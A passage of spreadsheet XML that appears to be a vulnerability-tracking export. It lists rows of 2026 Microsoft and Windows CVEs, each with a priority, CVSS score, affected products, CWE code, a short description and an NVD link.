          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="C888" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E888" s="5" t="inlineStr"/>
      <c r="F888" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G888" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H888" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L888" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="C889" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E889" s="5" t="inlineStr"/>
      <c r="F889" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G889" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L889" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="C890" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E890" s="5" t="inlineStr"/>
      <c r="F890" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G890" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H890" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L890" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
      <c r="C891" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E891" s="5" t="inlineStr"/>
      <c r="F891" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G891" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H891" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L891" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="C892" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E892" s="5" t="inlineStr"/>
      <c r="F892" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G892" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H892" s="5" t="inlineStr"/>
      <c r="I892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L892" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="C893" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E893" s="5" t="inlineStr"/>
      <c r="F893" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G893" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H893" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L893" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="C894" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E894" s="5" t="inlineStr"/>
      <c r="F894" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G894" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H894" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L894" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="C895" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E895" s="5" t="inlineStr"/>
      <c r="F895" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G895" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H895" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L895" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="C896" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E896" s="5" t="inlineStr"/>
      <c r="F896" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G896" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H896" s="5" t="inlineStr"/>
      <c r="I896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L896" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="C897" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E897" s="5" t="inlineStr"/>
      <c r="F897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G897" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H897" s="5" t="inlineStr"/>
      <c r="I897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L897" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="C898" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E898" s="5" t="inlineStr"/>
      <c r="F898" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G898" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H898" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="C899" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E899" s="5" t="inlineStr"/>
      <c r="F899" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G899" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H899" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L899" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="C900" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E900" s="5" t="inlineStr"/>
      <c r="F900" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G900" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H900" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L900" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="C901" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E901" s="5" t="inlineStr"/>
      <c r="F901" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G901" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H901" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L901" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="C902" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E902" s="5" t="inlineStr"/>
      <c r="F902" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G902" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H902" s="5" t="inlineStr"/>
      <c r="I902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L902" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="C903" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E903" s="5" t="inlineStr"/>
      <c r="F903" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G903" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H903" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L903" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="C904" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E904" s="5" t="inlineStr"/>
      <c r="F904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G904" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H904" s="5" t="inlineStr"/>
      <c r="I904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="C905" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G905" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H905" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L905" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69857</t>
        </is>
      </c>
      <c r="C906" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G906" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H906" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_cosmos_db</t>
        </is>
      </c>
      <c r="I906" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L906" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Azure Cosmos DB allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69857</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="C907" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G907" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H907" s="5" t="inlineStr"/>
      <c r="I907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L907" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70178</t>
        </is>
      </c>
      <c r="C908" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G908" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H908" s="5" t="inlineStr">
        <is>
          <t>microsoft:fabric</t>
        </is>
      </c>
      <c r="I908" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L908" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Fabric allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70178</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="C909" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G909" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H909" s="5" t="inlineStr"/>
      <c r="I909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L909" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="C910" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G910" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H910" s="5" t="inlineStr"/>
      <c r="I910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L910" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
